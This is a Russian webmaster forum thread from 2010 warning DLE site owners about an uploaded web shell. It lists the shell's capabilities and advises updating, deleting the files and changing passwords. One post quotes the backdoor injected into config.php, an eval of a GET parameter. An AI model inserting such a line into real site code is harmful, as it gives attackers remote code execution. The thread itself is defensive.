X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
> Проверяйте свои сайты DLE, Проверяйте свои сайты DLE
ChristmasNet
ChristmasNet
Topic Starter сообщение 24.9.2010, 13:19; Ответить: ChristmasNet
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 441
Регистрация: 13.1.2010
Из: Россия, ХМАО
Поблагодарили: 93 раза
Репутация:   16  


Есть такая группа или хацкер Web Shell by oRb.
Недавно обнаружил у себя на сайте шелл, залитый в папку uploads/fotos. Решил обновиться до DLE 9.0, после установки проверил антивирусом и нашел эту гадость.

Вот что может этот шелл.

Описание:

Авторизация
Инфа о сервере
Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
Просмотр, hexview, редактирование, давнлоад, аплоад файлов
Работа с zip архивами (упаковка, распаковка)
Консоль
SQL менеджер (MySql, PostgreSql)
Выполнение PHP кода
Обход Safe mode
Работа со строками + поиск хеша в онлайн базах
Брутфорс (FTP, MySql, PostgreSQL)
Биндпорты и бек-коннекты на C и Perl
Самоудаление
Поиск текста в файлах
Под UNIX/WIN

Из фишек

Антигугл (чекается юзерагент, если гугл, тогда 404)
Консолька запоминает введенные комманды. (перемещатся по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
Можно использовать AJAX
Малый вес (23.53 KB)
Удобен в инклюдах
Выбор кодировки, в которой работает шелл.


на сайте появляется админ с логином http://www.google.ru/search?q=wildlogin&am...art=10&sa=N

Смотрите свои сайты, обновляйте.


Поблагодарили: (8)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
neo-skynet
neo-skynet
сообщение 24.9.2010, 13:23; Ответить: neo-skynet
Сообщение #2


Дядько Admin
*****

Группа: Active User
Сообщений: 877
Регистрация: 5.1.2009
Из: Localhost
Поблагодарили: 123 раза
Репутация:   19  


Сайты проверил, вроде все чисто huh.gif Спасибо, возьмём на заметочку.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alex_zp
alex_zp
сообщение 26.9.2010, 11:50; Ответить: alex_zp
Сообщение #3


Новичок
*

Группа: User
Сообщений: 41
Регистрация: 8.7.2010
Поблагодарили: 3 раза
Репутация:   0  


Спасибо за совет и за бдительность. smile.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ChristmasNet
ChristmasNet
Topic Starter сообщение 29.9.2010, 7:21; Ответить: ChristmasNet
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 441
Регистрация: 13.1.2010
Из: Россия, ХМАО
Поблагодарили: 93 раза
Репутация:   16  


смотрите еще файл dbconfig.php и config.php в папке /engine/data/
В файл dbconfig.php прописывается жаваскрипт с партнёркой. А в файл config.php дописывается код:
'lang_123' => "{${@eval($_GET[cmd])}}",
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vkina
vkina
сообщение 29.9.2010, 7:42; Ответить: vkina
Сообщение #5


Бывалый
****


Группа: Banned
Сообщений: 458
Регистрация: 8.5.2009
Из: Украина
Поблагодарили: 58 раз
Репутация:   11  


Спасибо. На порно сайте нашол такой файл, а на других сайтах каким-то образом взламывают и вешают свои кликандеры. Пароль вопще не помогает.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Илюха
Илюха
сообщение 29.9.2010, 10:13; Ответить: Илюха
Сообщение #6


Топовый постер
*******

Группа: Active User
Сообщений: 3894
Регистрация: 11.6.2009
Поблагодарили: 718 раз
Репутация:   107  


А как выглядит шел в папке uploads/fotos? в виде какого файла. Насколько я понимаю и права доступа 644 не помогают в этом случае?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Morbid
Morbid
сообщение 29.9.2010, 13:04; Ответить: Morbid
Сообщение #7


Новичок
*

Группа: Viewer
Сообщений: 8
Регистрация: 22.9.2010
Поблагодарили: 0 раз
Репутация:   0  


Спасибо, что предупредили
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Илюха
Илюха
сообщение 30.9.2010, 7:09; Ответить: Илюха
Сообщение #8


Топовый постер
*******

Группа: Active User
Сообщений: 3894
Регистрация: 11.6.2009
Поблагодарили: 718 раз
Репутация:   107  


На одном из сайтах нашел такую хрень. Спасибо большое. Интересно только как это туда попадает?

Сообщение отредактировал Илюха - 30.9.2010, 7:13
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Snejebelka
Snejebelka
сообщение 30.9.2010, 7:35; Ответить: Snejebelka
Сообщение #9


Участник
***

Группа: User
Сообщений: 175
Регистрация: 2.4.2010
Из: Ростов-на-Дону
Поблагодарили: 69 раз
Репутация:   24  


(Илюха @ 30.9.2010, 7:09) *
На одном из сайтах нашел такую хрень. Спасибо большое. Интересно только как это туда попадает?


Очень просто попадает у вас дырки с недостаточной фильтрацией данных не закрыты. ТС правильно сделал выводы и не стал дыры убирать, а обновил версию. В последней версии эти уязвимости убраны. Убирайте уязвимости, шелл ищите и удаляйте, файлы его расположены в папке uploads, их может быть несколько. Пароли поменяйте и впредь такого безобразия не будет.


--------------------
Жизнь прекрасна! Если правильно подобрать антидепрессанты...


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Seo-optimist
Seo-optimist
сообщение 1.10.2010, 13:46; Ответить: Seo-optimist
Сообщение #10


Старожил
******


Группа: Active User
Сообщений: 2109
Регистрация: 31.1.2009
Из: Ukraine
Поблагодарили: 615 раз
Репутация:   158  


Хммм... нашел на одном сайте такое, не подскажите как избавится?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Приглашаю к обмену ссылками любые нормальные сайты.
Да! Меняюсь со всеми!
33 kluben 8045 Сегодня, 3:52
автор: alekspik
Горячая тема (нет новых ответов) Продам сайты в ГГЛ + мира + ротапост
тиц 10-40
29 xline 2999 Вчера, 21:25
автор: xline
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
278 kaartes 102828 14.12.2017, 10:55
автор: kukla
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
15 Nell 1166 13.12.2017, 23:36
автор: Nell
Открытая тема (нет новых ответов) Требуется почистить сайты от вирусов
6 Mukis 356 10.12.2017, 15:40
автор: qpPeW


 



RSS Текстовая версия Сейчас: 16.12.2017, 23:15
Дизайн